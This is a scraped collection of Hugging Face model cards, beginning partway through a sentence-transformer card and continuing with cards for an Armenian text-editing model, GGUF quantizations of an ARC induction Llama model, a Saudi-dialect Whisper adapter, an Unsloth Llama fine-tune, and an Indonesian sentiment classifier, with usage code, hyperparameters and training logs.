addiction issues.. also found that in that version there is twice the amount of DXM. When I asked if I could speak to a chemist or scientist, I was told they didn't have anyone who fit that description there. It’s been eight years since I kicked NyQuil. I've been sober from alcohol for four years.</code> | | <code>what are mineral water</code> | <code>1 Mineral water – water from a mineral spring that contains various minerals, such as salts and sulfur compounds. 2 It comes from a source tapped at one or more bore holes or spring, and originates from a geologically and physically protected underground water source. Mineral water – water from a mineral spring that contains various minerals, such as salts and sulfur compounds. 2 It comes from a source tapped at one or more bore holes or spring, and originates from a geologically and physically protected underground water source.</code> | <code>Minerals for Your Body. 
Drinking mineral water is beneficial to health and well-being. But it is not only the amount of water you drink that is important-what the water contains is even more essential.inerals for Your Body. Drinking mineral water is beneficial to health and well-being. But it is not only the amount of water you drink that is important-what the water contains is even more essential.</code> | * Loss: [<code>CachedMultipleNegativesRankingLoss</code>](https://sbert.net/docs/package_reference/sentence_transformer/losses.html#cachedmultiplenegativesrankingloss) with these parameters: ```json { "scale": 20.0, "similarity_fct": "cos_sim", "mini_batch_size": 16 } ``` ### Training Hyperparameters #### Non-Default Hyperparameters - `per_device_train_batch_size`: 512 - `per_device_eval_batch_size`: 512 - `learning_rate`: 8e-05 - `num_train_epochs`: 1 - `warmup_ratio`: 0.05 - `bf16`: True - `batch_sampler`: no_duplicates #### All Hyperparameters <details><summary>Click to expand</summary> - `overwrite_output_dir`: False - `do_predict`: False - `eval_strategy`: no - `prediction_loss_only`: True - `per_device_train_batch_size`: 512 - `per_device_eval_batch_size`: 512 - `per_gpu_train_batch_size`: None - `per_gpu_eval_batch_size`: None - `gradient_accumulation_steps`: 1 - `eval_accumulation_steps`: None - `torch_empty_cache_steps`: None - `learning_rate`: 8e-05 - `weight_decay`: 0.0 - `adam_beta1`: 0.9 - `adam_beta2`: 0.999 - `adam_epsilon`: 1e-08 - `max_grad_norm`: 1.0 - `num_train_epochs`: 1 - `max_steps`: -1 - `lr_scheduler_type`: linear - `lr_scheduler_kwargs`: {} - `warmup_ratio`: 0.05 - `warmup_steps`: 0 - `log_level`: passive - `log_level_replica`: warning - `log_on_each_node`: True - `logging_nan_inf_filter`: True - `save_safetensors`: True - `save_on_each_node`: False - `save_only_model`: False - `restore_callback_states_from_checkpoint`: False - `no_cuda`: False - `use_cpu`: False - `use_mps_device`: False - `seed`: 42 - `data_seed`: None - `jit_mode_eval`: False - `use_ipex`: False - `bf16`: True - `fp16`: False - `fp16_opt_level`: O1 - `half_precision_backend`: auto - `bf16_full_eval`: False - `fp16_full_eval`: False - `tf32`: None - `local_rank`: 0 - `ddp_backend`: None - `tpu_num_cores`: None - `tpu_metrics_debug`: False - `debug`: [] - `dataloader_drop_last`: False - `dataloader_num_workers`: 0 - `dataloader_prefetch_factor`: None - `past_index`: -1 - `disable_tqdm`: False - `remove_unused_columns`: True - `label_names`: None - `load_best_model_at_end`: False - `ignore_data_skip`: False - `fsdp`: [] - `fsdp_min_num_params`: 0 - `fsdp_config`: {'min_num_params': 0, 'xla': False, 'xla_fsdp_v2': False, 'xla_fsdp_grad_ckpt': False} - `fsdp_transformer_layer_cls_to_wrap`: None - `accelerator_config`: {'split_batches': False, 'dispatch_batches': None, 'even_batches': True, 'use_seedable_sampler': True, 'non_blocking': False, 'gradient_accumulation_kwargs': None} - `deepspeed`: None - `label_smoothing_factor`: 0.0 - `optim`: adamw_torch - `optim_args`: None - `adafactor`: False - `group_by_length`: False - `length_column_name`: length - `ddp_find_unused_parameters`: None - `ddp_bucket_cap_mb`: None - `ddp_broadcast_buffers`: False - `dataloader_pin_memory`: True - `dataloader_persistent_workers`: False - `skip_memory_metrics`: True - `use_legacy_prediction_loop`: False - `push_to_hub`: False - `resume_from_checkpoint`: None - `hub_model_id`: None - `hub_strategy`: every_save - `hub_private_repo`: None - `hub_always_push`: False - `gradient_checkpointing`: False - `gradient_checkpointing_kwargs`: None - 
`include_inputs_for_metrics`: False - `include_for_metrics`: [] - `eval_do_concat_batches`: True - `fp16_backend`: auto - `push_to_hub_model_id`: None - `push_to_hub_organization`: None - `mp_parameters`: - `auto_find_batch_size`: False - `full_determinism`: False - `torchdynamo`: None - `ray_scope`: last - `ddp_timeout`: 1800 - `torch_compile`: False - `torch_compile_backend`: None - `torch_compile_mode`: None - `include_tokens_per_second`: False - `include_num_input_tokens_seen`: False - `neftune_noise_alpha`: None - `optim_target_modules`: None - `batch_eval_metrics`: False - `eval_on_start`: False - `use_liger_kernel`: False - `eval_use_gather_object`: False - `average_tokens_across_devices`: False - `prompts`: None - `batch_sampler`: no_duplicates - `multi_dataset_batch_sampler`: proportional </details> ### Training Logs | Epoch | Step | Training Loss | msmarco-co-condenser-dev_cosine_accuracy | |:------:|:----:|:-------------:|:----------------------------------------:| | -1 | -1 | - | 0.6060 | | 0.2048 | 500 | 0.6461 | - | | 0.4095 | 1000 | 0.1478 | - | | 0.6143 | 1500 | 0.1107 | - | | 0.8190 | 2000 | 0.0906 | - | | -1 | -1 | - | 0.9880 | ### Framework Versions - Python: 3.10.12 - Sentence Transformers: 4.1.0 - Transformers: 4.52.4 - PyTorch: 2.6.0+cu124 - Accelerate: 1.7.0 - Datasets: 3.6.0 - Tokenizers: 0.21.1 ## Citation ### BibTeX #### Sentence Transformers ```bibtex @inproceedings{reimers-2019-sentence-bert, title = "Sentence-BERT: Sentence Embeddings using Siamese BERT-Networks", author = "Reimers, Nils and Gurevych, Iryna", booktitle = "Proceedings of the 2019 Conference on Empirical Methods in Natural Language Processing", month = "11", year = "2019", publisher = "Association for Computational Linguistics", url = "https://arxiv.org/abs/1908.10084", } ``` #### CachedMultipleNegativesRankingLoss ```bibtex @misc{gao2021scaling, title={Scaling Deep Contrastive Learning Batch Size under Memory Limited Setup}, author={Luyu Gao and Yunyi Zhang and Jiawei Han and Jamie Callan}, year={2021}, eprint={2101.06983}, archivePrefix={arXiv}, primaryClass={cs.LG} } ``` <!-- ## Glossary *Clearly define terms in order to be accessible across audiences.* --> <!-- ## Model Card Authors *Lists the people who create the model card, providing recognition and accountability for the detailed work that goes into its construction.* --> <!-- ## Model Card Contact *Provides a way for people who have updates to the Model Card, suggestions, or questions, to contact the Model Card authors.* -->
Syntheresis/auto-edit-hy-500m
Syntheresis
2025-06-11T10:48:52Z
0
0
null
[ "hy", "dataset:Syntheresis/SAW-corpus", "license:apache-2.0", "region:us" ]
null
2025-06-10T23:14:22Z
--- license: apache-2.0 datasets: - Syntheresis/SAW-corpus language: - hy --- # Model Card for auto-edit-hy-500m ## Model Details ### Model Description auto-edit-hy-500m is a specialized model for auto-editing Armenian (hy) text, using the AutoEditForConditionalGeneration architecture from the hy-models library. With approximately 500M parameters, it processes Armenian text to correct errors, ensuring clarity and accuracy across various contexts. The model was trained on a synthetic dataset created from the SAW-corpus, incorporating diverse error patterns to support robust auto-editing capabilities for Armenian NLP. It supports text with Markdown formatting, including lists and tables. - **Developed by:** MMinasyan (https://github.com/MMinasyan) - **Model type:** text-to-text - **Language(s) (NLP):** Armenian (hy) - **License:** Apache-2.0 ### Model Sources - **Repository:** https://github.com/MMinasyan/hy-models ## Uses ### Direct Use The model is intended for direct use in auto-editing Armenian text, correcting errors to improve clarity, accuracy, and overall quality. ### Out-of-Scope Use - Use with non-Armenian languages. - Tasks beyond auto-editing, such as general language modeling or translation. ## Bias, Risks, and Limitations - Limited to Armenian text, with no support for other languages. - No evaluation metrics are available due to the lack of comparable Armenian auto-editing models. ### Recommendations Users should test the model on their specific use cases to ensure it meets their needs. ## How to Get Started with the Model ```python import torch from transformers import AutoTokenizer from hy_models import AutoEditForConditionalGeneration # Install hy-models: pip install git+https://github.com/MMinasyan/hy-models tokenizer = AutoTokenizer.from_pretrained("Syntheresis/auto-edit-hy-500m") model = AutoEditForConditionalGeneration.from_pretrained("Syntheresis/auto-edit-hy-500m").to("cuda") # Auto-edit a random YouTube comment input_text = "շատ գրագետ խոսումեք: բայց փաստն այնե որ գողությունը ավելացելա հետեվաբար, ձեր խոսոլը զրոե պեքե աշխատել" inputs = tokenizer([input_text], return_tensors="pt").to("cuda") outputs = model.generate(**inputs) output_text = tokenizer.decode(outputs[0], skip_special_tokens=True) print(output_text) # Շատ գրագետ խոսում եք, բայց փաստն այն է, որ գողությունը ավելացել է, հետեւաբար, ձեր խոսելը զրո է, պետք է աշխատել ``` ## Training Details ### Training Data The model was trained on a synthetic dataset derived from the SAW-corpus (https://huggingface.co/datasets/Syntheresis/SAW-corpus). The synthetic dataset was created by: - Regenerating masked sequences with token-level and character-level generative models. - Applying back-translation with open-source machine-translation models for text variety. - Introducing random grammatical errors with over 500 grammatical mistake patterns. ### Training Procedure #### Training Hyperparameters - **Training regime:** Mixed precision bf16, batch size increasing from 36,864 to 147,456, ~500,000 steps, with warmup and CosineAnnealing at a peak learning rate of 0.0001. 
## Technical Specifications ### Model Architecture and Objective - Architecture: Text-to-text model with cross-attention, pre-norm, Rotary Position Embeddings (RoPE), and Grouped-Query Attention (GQA). - Objective: Auto-editing Armenian text to correct errors and improve quality. ### Compute Infrastructure #### Hardware Dual NVIDIA RTX 4090 GPUs #### Software - Hugging Face transformers library (version 4.49.0.dev0) - hy-models library (https://github.com/MMinasyan/hy-models) ## Model Card Contact [email protected]
RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf
RichardErkhov
2025-06-11T10:47:32Z
0
0
null
[ "gguf", "endpoints_compatible", "region:us", "conversational" ]
null
2025-06-11T08:37:20Z
Quantization made by Richard Erkhov.

[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)

potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer - GGUF
- Model creator: https://huggingface.co/suehyunpark/
- Original model: https://huggingface.co/suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer/

| Name | Quant method | Size |
| ---- | ---- | ---- |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q2_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q2_K.gguf) | Q2_K | 2.96GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_XS.gguf) | IQ3_XS | 3.28GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_S.gguf) | IQ3_S | 3.43GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_S.gguf) | Q3_K_S | 3.41GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ3_M.gguf) | IQ3_M | 3.52GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K.gguf) | Q3_K | 3.74GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_M.gguf) | Q3_K_M | 3.74GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q3_K_L.gguf) | Q3_K_L | 4.03GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_XS.gguf) | IQ4_XS | 4.18GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_0.gguf) | Q4_0 | 4.34GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.IQ4_NL.gguf) | IQ4_NL | 4.38GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_S.gguf) | Q4_K_S | 4.37GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K.gguf) | Q4_K | 4.58GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_M.gguf) | Q4_K_M | 4.58GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_1.gguf) | Q4_1 | 4.78GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_0.gguf) | Q5_0 | 5.21GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_S.gguf) | Q5_K_S | 5.21GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K.gguf) | Q5_K | 5.34GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_K_M.gguf) | Q5_K_M | 5.34GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_1.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q5_1.gguf) | Q5_1 | 5.65GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q6_K.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q6_K.gguf) | Q6_K | 6.14GB |
| [potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q8_0.gguf](https://huggingface.co/RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf/blob/main/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q8_0.gguf) | Q8_0 | 7.95GB |

Original model description:
---
base_model: barc0/Llama-3.1-ARC-Potpourri-Induction-8B
datasets:
- suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer
library_name: transformers
model_name: barc0/Llama-3.1-ARC-Potpourri-Induction-8B
tags:
- generated_from_trainer
- alignment-handbook
- trl
- sft
licence: license
---

# Model Card for barc0/Llama-3.1-ARC-Potpourri-Induction-8B

This model is a fine-tuned version of [barc0/Llama-3.1-ARC-Potpourri-Induction-8B](https://huggingface.co/barc0/Llama-3.1-ARC-Potpourri-Induction-8B) on the [suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer](https://huggingface.co/datasets/suehyunpark/induction_arc_inputs_train_bc_trajectories_max10-per-task_check_answer) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).

## Quick start

```python
from transformers import pipeline

question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="suehyunpark/potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```

## Training procedure

[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/suehyun/arc-improve/runs/4y71yzaa)

This model was trained with SFT.

### Framework versions

- TRL: 0.12.1
- Transformers: 4.46.2
- Pytorch: 2.5.1
- Datasets: 3.1.0
- Tokenizers: 0.20.3

## Citations

Cite TRL as:

```bibtex
@misc{vonwerra2022trl,
    title        = {{TRL: Transformer Reinforcement Learning}},
    author       = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
    year         = 2020,
    journal      = {GitHub repository},
    publisher    = {GitHub},
    howpublished = {\url{https://github.com/huggingface/trl}}
}
```
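The table above only lists the files. For completeness, here is a minimal, hedged sketch of how one of these quants could be fetched and loaded locally; it assumes the `huggingface_hub` and `llama-cpp-python` packages are installed, and picks the Q4_K_M entry from the table (any row works the same way).

```python
from huggingface_hub import hf_hub_download
from llama_cpp import Llama

# Download one quant listed in the table above (Q4_K_M, ~4.58GB).
gguf_path = hf_hub_download(
    repo_id="RichardErkhov/suehyunpark_-_potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer-gguf",
    filename="potpourri-8b-inst-fft-induction-bc-trajectory-max10-per-task-check-answer.Q4_K_M.gguf",
)

# Load the quantized model; n_ctx is an illustrative context size, not a repo setting.
llm = Llama(model_path=gguf_path, n_ctx=4096)
print(llm("def transform(grid):", max_tokens=64)["choices"][0]["text"])
```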
Bruno7/ksa-whisper
Bruno7
2025-06-11T10:45:44Z
0
0
transformers
[ "transformers", "safetensors", "automatic-speech-recognition", "speech", "audio", "transformers- peft", "lora", "adapter", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
automatic-speech-recognition
2025-06-11T10:33:04Z
---
language: en
license: apache-2.0
tags:
- automatic-speech-recognition
- speech
- audio
- transformers
- peft
- lora
- adapter
library_name: transformers
pipeline_tag: automatic-speech-recognition
---

# Bruno7/ksa-whisper

## Model Description

Arabic Whisper PEFT adapter for the Saudi dialect.

## Base Model

This adapter is designed to work with: `openai/whisper-large-v3`

## Usage

```python
import torch
from transformers import pipeline
from peft import PeftModel, PeftConfig

# Load the adapter configuration
config = PeftConfig.from_pretrained("Bruno7/ksa-whisper")

# Load base model into a pipeline
pipe = pipeline(
    "automatic-speech-recognition",
    model=config.base_model_name_or_path,
    device="cuda" if torch.cuda.is_available() else "cpu"
)

# Load and apply the adapter
model = PeftModel.from_pretrained(pipe.model, "Bruno7/ksa-whisper")
pipe.model = model

# Process audio
result = pipe("path_to_audio.wav")
print(result["text"])
```

### Alternative Usage (Direct Loading)

```python
from transformers import AutoProcessor, AutoModelForSpeechSeq2Seq
from peft import PeftModel

# Load base model and processor
processor = AutoProcessor.from_pretrained("openai/whisper-large-v3")
model = AutoModelForSpeechSeq2Seq.from_pretrained("openai/whisper-large-v3")

# Apply adapter
model = PeftModel.from_pretrained(model, "Bruno7/ksa-whisper")

# Your inference code here
```

## Model Architecture

This is a PEFT (Parameter-Efficient Fine-Tuning) adapter that modifies a base Whisper model for improved performance on a specific domain or language. The adapter uses LoRA (Low-Rank Adaptation) to fine-tune the model efficiently while keeping the trainable parameter count minimal.

## Inference

This adapter can be applied to the base model for domain-specific speech recognition tasks.

## Limitations

- Requires the base model to be loaded separately
- Performance may vary with different audio qualities and accents
- Requires audio preprocessing for optimal results
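For deployment it can be convenient to fold the LoRA weights into the base model so that inference needs no PEFT wrapper at runtime. A hedged sketch using PEFT's `merge_and_unload` follows; the save path and dtype are illustrative choices, not part of this repo.

```python
import torch
from transformers import AutoModelForSpeechSeq2Seq, AutoProcessor
from peft import PeftModel

# Load the base model and attach the adapter, as in the Usage section.
base = AutoModelForSpeechSeq2Seq.from_pretrained(
    "openai/whisper-large-v3", torch_dtype=torch.float16
)
model = PeftModel.from_pretrained(base, "Bruno7/ksa-whisper")

# Fold the LoRA deltas into the base weights and drop the PEFT wrapper.
merged = model.merge_and_unload()

# Save a standalone checkpoint (directory name is illustrative).
merged.save_pretrained("ksa-whisper-merged")
AutoProcessor.from_pretrained("openai/whisper-large-v3").save_pretrained("ksa-whisper-merged")
```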
TrinhHoangKhang/LLama8B_firstModel
TrinhHoangKhang
2025-06-11T10:44:04Z
0
0
transformers
[ "transformers", "safetensors", "text-generation-inference", "unsloth", "llama", "trl", "en", "license:apache-2.0", "endpoints_compatible", "region:us" ]
null
2025-06-11T10:43:57Z
---
base_model: unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit
tags:
- text-generation-inference
- transformers
- unsloth
- llama
- trl
license: apache-2.0
language:
- en
---

# Uploaded model

- **Developed by:** TrinhHoangKhang
- **License:** apache-2.0
- **Finetuned from model:** unsloth/meta-llama-3.1-8b-unsloth-bnb-4bit

This Llama model was trained 2x faster with [Unsloth](https://github.com/unslothai/unsloth) and Hugging Face's TRL library.

[<img src="https://raw.githubusercontent.com/unslothai/unsloth/main/images/unsloth%20made%20with%20love.png" width="200"/>](https://github.com/unslothai/unsloth)
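The card ships no usage snippet; below is a minimal, hedged sketch of loading the checkpoint for inference with Unsloth. It assumes the repo contains a full model (not just an adapter), and the sequence length, 4-bit flag, and prompt are illustrative.

```python
from unsloth import FastLanguageModel

# Load the fine-tuned checkpoint in 4-bit (values are illustrative, not repo settings).
model, tokenizer = FastLanguageModel.from_pretrained(
    model_name="TrinhHoangKhang/LLama8B_firstModel",
    max_seq_length=2048,
    load_in_4bit=True,
)
FastLanguageModel.for_inference(model)  # switch to Unsloth's fast inference mode

inputs = tokenizer("Hello, how are you?", return_tensors="pt").to(model.device)
outputs = model.generate(**inputs, max_new_tokens=64)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```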
johannawawi/model-for-sosmed-analysis-v3
johannawawi
2025-06-11T10:41:53Z
0
0
transformers
[ "transformers", "safetensors", "roberta", "text-classification", "generated_from_trainer", "base_model:w11wo/indonesian-roberta-base-sentiment-classifier", "base_model:finetune:w11wo/indonesian-roberta-base-sentiment-classifier", "license:mit", "autotrain_compatible", "endpoints_compatible", "region:us" ]
text-classification
2025-06-11T10:41:21Z
---
library_name: transformers
license: mit
base_model: w11wo/indonesian-roberta-base-sentiment-classifier
tags:
- generated_from_trainer
metrics:
- accuracy
model-index:
- name: results_final
  results: []
---

<!-- This model card has been generated automatically according to the information the Trainer had access to. You should probably proofread and complete it, then remove this comment. -->

# results_final

This model is a fine-tuned version of [w11wo/indonesian-roberta-base-sentiment-classifier](https://huggingface.co/w11wo/indonesian-roberta-base-sentiment-classifier) on an unspecified dataset.
It achieves the following results on the evaluation set:
- Loss: 0.3752
- Accuracy: 0.8933
- F1 Macro: 0.8932
- F1 Weighted: 0.8932
- Precision Macro: 0.8952
- Recall Macro: 0.8933
- Precision Weighted: 0.8953
- Recall Weighted: 0.8933

## Model description

More information needed

## Intended uses & limitations

More information needed

## Training and evaluation data

More information needed

## Training procedure

### Training hyperparameters

The following hyperparameters were used during training:
- learning_rate: 3e-06
- train_batch_size: 8
- eval_batch_size: 8
- seed: 42
- optimizer: Use OptimizerNames.ADAMW_TORCH with betas=(0.9,0.999) and epsilon=1e-08 and optimizer_args=No additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_ratio: 0.1
- num_epochs: 10
- mixed_precision_training: Native AMP

### Training results

| Training Loss | Epoch  | Step | Validation Loss | Accuracy | F1 Macro | F1 Weighted | Precision Macro | Recall Macro | Precision Weighted | Recall Weighted |
|:-------------:|:------:|:----:|:---------------:|:--------:|:--------:|:-----------:|:---------------:|:------------:|:------------------:|:---------------:|
| 0.3425        | 0.3436 | 100  | 0.3619          | 0.8898   | 0.8897   | 0.8897      | 0.8910          | 0.8898       | 0.8911             | 0.8898          |
| 0.4442        | 0.6873 | 200  | 0.3535          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2777        | 1.0309 | 300  | 0.3620          | 0.8864   | 0.8863   | 0.8863      | 0.8878          | 0.8864       | 0.8878             | 0.8864          |
| 0.314         | 1.3746 | 400  | 0.3739          | 0.8881   | 0.8879   | 0.8879      | 0.8894          | 0.8881       | 0.8894             | 0.8881          |
| 0.3447        | 1.7182 | 500  | 0.3637          | 0.8881   | 0.8880   | 0.8880      | 0.8888          | 0.8881       | 0.8888             | 0.8881          |
| 0.3629        | 2.0619 | 600  | 0.3581          | 0.8916   | 0.8915   | 0.8915      | 0.8929          | 0.8916       | 0.8929             | 0.8916          |
| 0.3789        | 2.4055 | 700  | 0.3611          | 0.8898   | 0.8898   | 0.8898      | 0.8904          | 0.8898       | 0.8905             | 0.8898          |
| 0.3392        | 2.7491 | 800  | 0.3609          | 0.8898   | 0.8898   | 0.8898      | 0.8909          | 0.8899       | 0.8910             | 0.8898          |
| 0.3829        | 3.0928 | 900  | 0.3506          | 0.8881   | 0.8881   | 0.8881      | 0.8886          | 0.8881       | 0.8886             | 0.8881          |
| 0.2468        | 3.4364 | 1000 | 0.3752          | 0.8933   | 0.8932   | 0.8932      | 0.8952          | 0.8933       | 0.8953             | 0.8933          |
| 0.3509        | 3.7801 | 1100 | 0.3634          | 0.8864   | 0.8863   | 0.8863      | 0.8874          | 0.8864       | 0.8875             | 0.8864          |
| 0.3282        | 4.1237 | 1200 | 0.3657          | 0.8881   | 0.8880   | 0.8880      | 0.8886          | 0.8881       | 0.8886             | 0.8881          |
| 0.2847        | 4.4674 | 1300 | 0.3732          | 0.8881   | 0.8880   | 0.8880      | 0.8891          | 0.8881       | 0.8891             | 0.8881          |
| 0.3151        | 4.8110 | 1400 | 0.3674          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.3468        | 5.1546 | 1500 | 0.3666          | 0.8847   | 0.8846   | 0.8846      | 0.8853          | 0.8847       | 0.8853             | 0.8847          |
| 0.3638        | 5.4983 | 1600 | 0.3628          | 0.8864   | 0.8863   | 0.8863      | 0.8869          | 0.8864       | 0.8869             | 0.8864          |
| 0.2822        | 5.8419 | 1700 | 0.3695          | 0.8864   | 0.8863   | 0.8863      | 0.8870          | 0.8864       | 0.8870             | 0.8864          |
| 0.334         | 6.1856 | 1800 | 0.3582          | 0.8898   | 0.8898   | 0.8898      | 0.8903          | 0.8898       | 0.8903             | 0.8898          |
